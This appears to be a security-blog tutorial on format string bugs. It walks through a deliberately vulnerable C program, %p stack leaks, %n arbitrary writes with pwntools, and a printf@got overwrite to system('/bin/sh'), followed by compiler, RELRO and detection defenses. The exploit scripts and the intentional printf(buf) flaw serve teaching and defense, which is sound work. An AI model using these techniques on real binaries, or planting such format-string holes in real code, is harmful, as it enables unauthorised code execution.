Format String Vulnerabilities Explained: From %p Leaks to Arbitrary Write

RE & Pwn
Time it takes to read this article 6 minutes.

Disclaimer: This article is for education and authorized security testing only. Run every command in your own lab or against systems you have explicit written permission to test. Exploiting software you do not own or control is illegal in most jurisdictions.

Introduction / Overview

A format string vulnerability is one of the cleanest primitives in binary exploitation: a single misused printf-family call can be coerced into both an arbitrary read and an arbitrary write. The bug class is old (CWE-134, "Use of Externally-Controlled Format String"), yet it still surfaces in CTFs, embedded firmware, and legacy C code. Famous real-world cases include CVE-2012-0809 (sudo's sudo_debug format string) and the wu-ftpd site exec bug.

The root cause is simple. When a program calls printf(user_input) instead of printf("%s", user_input), the attacker controls the format string itself. Because the variadic printf blindly trusts the format string to tell it how many arguments were pushed, attacker-supplied conversion specifiers like %p and %n read and write the process's stack and memory.

How it works / Background

printf is variadic: it pulls arguments off the stack (or registers, on x86-64) according to the format string. It has no way to know how many arguments the caller actually passed. If you supply more conversion specifiers than there are real arguments, printf happily walks past them into adjacent stack memory.

Two specifiers matter most:

  • %p (or %x) — leak. Reads the next argument slot and prints it as a pointer/hex value. Chaining many of these dumps the stack, including saved return addresses, canaries, and libc pointers.
  • %nwrite. Instead of printing, %n writes the number of bytes printed so far into the address pointed to by the corresponding argument. Combined with width specifiers like %100c, you control exactly what value gets written. Variants: %hn (2-byte write) and %hhn (1-byte write) let you write smaller chunks to avoid printing billions of characters.

The positional notation %7$p directly accesses the 7th argument slot, which is essential once you locate your controlled buffer on the stack. The standard pivot is a GOT overwrite: redirect a Global Offset Table entry (e.g. printf@got) to system so the next library call executes attacker-chosen code.

Prerequisites / Lab setup

We will build a deliberately vulnerable binary on Linux x86-64. You need gcc, gdb with pwndbg or GEF, and pwntools.

# Ubuntu / Kali
sudo apt update && sudo apt install -y gcc gdb python3-pip
pip3 install pwntools
Bash

The vulnerable program:

// vuln.c
#include <stdio.h>
#include <unistd.h>

void vuln(void) {
    char buf[128];
    read(0, buf, sizeof(buf));
    printf(buf);          // BUG: user-controlled format string
    fflush(stdout);
}

int main(void) {
    vuln();
    return 0;
}
C

Compile with modern protections deliberately weakened so the mechanics are visible:

gcc -m64 -fno-stack-protector -no-pie -z norelro -o vuln vuln.c
checksec --file=./vuln
Bash

-no-pie keeps addresses static, and -z norelro keeps the GOT writable — both make the GOT overwrite straightforward for learning.

Walkthrough / PoC

Step 1 — Confirm the bug and find your offset

Feed format specifiers and watch the program leak stack data:

printf 'AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p\n' | ./vuln
Bash

To find which argument index holds your buffer, send a known marker and a string of positional reads:

python3 -c 'print("AAAAAAAA" + ".%p"*12)' | ./vuln
Bash

When a leaked value equals 0x4141414141414141, that slot index is where your input lands. On x86-64 the first six varargs come from registers, so the stack-resident buffer typically appears around offset 6. Verify precisely:

python3 -c 'print("ABCD" + "%6$p")' | ./vuln
Bash

If it prints 0x44434241, offset 6 points at your buffer.

Step 2 — Leak useful pointers

Dump several slots and identify libc and stack addresses to defeat ASLR (if it were enabled) and locate gadgets:

# leak.py
from pwn import *

io = process('./vuln')
io.sendline(b'%6$p|%7$p|%8$p|%9$p')
print(io.recvline())
Python

Step 3 — Arbitrary write with %n

pwntools' fmtstr_payload builds the %n write for you. It computes the width specifiers and packs the target addresses automatically:

# write.py
from pwn import *

elf = ELF('./vuln')
io  = process('./vuln')

OFFSET   = 6
got_printf = elf.got['printf']

# Overwrite printf@GOT with the address of vuln() to re-trigger the read loop
payload = fmtstr_payload(OFFSET, {got_printf: elf.symbols['vuln']})
io.sendline(payload)
io.interactive()
Python

Step 4 — GOT overwrite to pop a shell

To get code execution, point a GOT entry at system and arrange for a /bin/sh argument. A common technique against a libc target is overwriting printf@got (or puts@got) with system, then sending /bin/sh so the next call becomes system("/bin/sh"):

# exploit.py
from pwn import *

elf  = ELF('./vuln')
libc = elf.libc
io   = process('./vuln')

OFFSET = 6

# 1) Leak a libc address from the GOT to defeat ASLR
io.sendline(b'%6$p')
# ... compute libc base from the leak ...
# system = libc_base + libc.symbols['system']

# 2) Overwrite printf@got with system
# payload = fmtstr_payload(OFFSET, {elf.got['printf']: system})
# io.sendline(payload)

# 3) Next input becomes the argument to system
# io.sendline(b'/bin/sh\x00')
io.interactive()
Python

Always prefer %hhn byte-by-byte writes (pwntools does this by default) so you never have to print billions of padding characters for a full 8-byte pointer.

Mermaid diagram

Format String Vulnerabilities Explained: From %p Leaks to Arbitrary Write diagram 1

The diagram shows the two primitives: %p reads to defeat ASLR, and %n writes to hijack a GOT entry, converging on system("/bin/sh") for code execution.

Detection & Defense (Blue Team)

Format string bugs are almost entirely preventable. Mitigations span the source, the compiler, and runtime hardening.

1. Never pass user data as a format string. The single most effective fix:

printf("%s", user_input);   // correct
puts(user_input);           // also fine
C

2. Compiler warnings as errors. GCC and Clang detect non-literal format strings:

gcc -Wformat=2 -Wformat-security -Werror=format-security -o app app.c
Bash

-Wformat-security flags printf(buf) at compile time. Make it a hard build failure in CI.

3. Static analysis. Run flawfinder, cppcheck, or semgrep to catch CWE-134 patterns across a codebase:

flawfinder --minlevel=4 src/
semgrep --config "p/c" src/
Bash

4. Runtime hardening. Enable Full RELRO so the GOT is mapped read-only after relocation, neutering GOT overwrites:

gcc -Wl,-z,relro,-z,now -fstack-protector-strong -pie -fPIE -o app app.c
checksec --file=./app
Bash

Full RELRO (-z now) is the key control here; combined with PIE/ASLR it raises the cost of any %n-based write substantially. FORTIFY_SOURCE (-D_FORTIFY_SOURCE=2) additionally aborts on %n writes located in writable memory at runtime.

5. Detection. Monitor crash telemetry: format string exploitation produces characteristic SIGSEGV patterns from %n writes to unmapped addresses. Log-scan FTP/CGI/syslog inputs for clustered % specifiers. In ATT&CK terms this maps to T1203 (Exploitation for Client Execution); treat repeated crashes in a printf call frame as an exploitation indicator and capture cores for triage.

For deeper static triage of an unknown binary, decompiling the call site in Ghidra quickly reveals whether the format argument is a literal or attacker-reachable, and a GDB and pwndbg workflow confirms the exploitability dynamically.

Conclusion

Format string vulnerabilities pack two powerful primitives into one bug: %p for arbitrary read and %n for arbitrary write. Once you can locate your buffer offset (%N$p) and write to a chosen address, a GOT overwrite to system is a short hop to a shell. The defensive story is equally clear — pass user data as an argument, never as the format, enable -Werror=format-security, and ship with Full RELRO. For more on the next pivot step, see Return-Oriented Programming basics.

References

Comments

Copied title and URL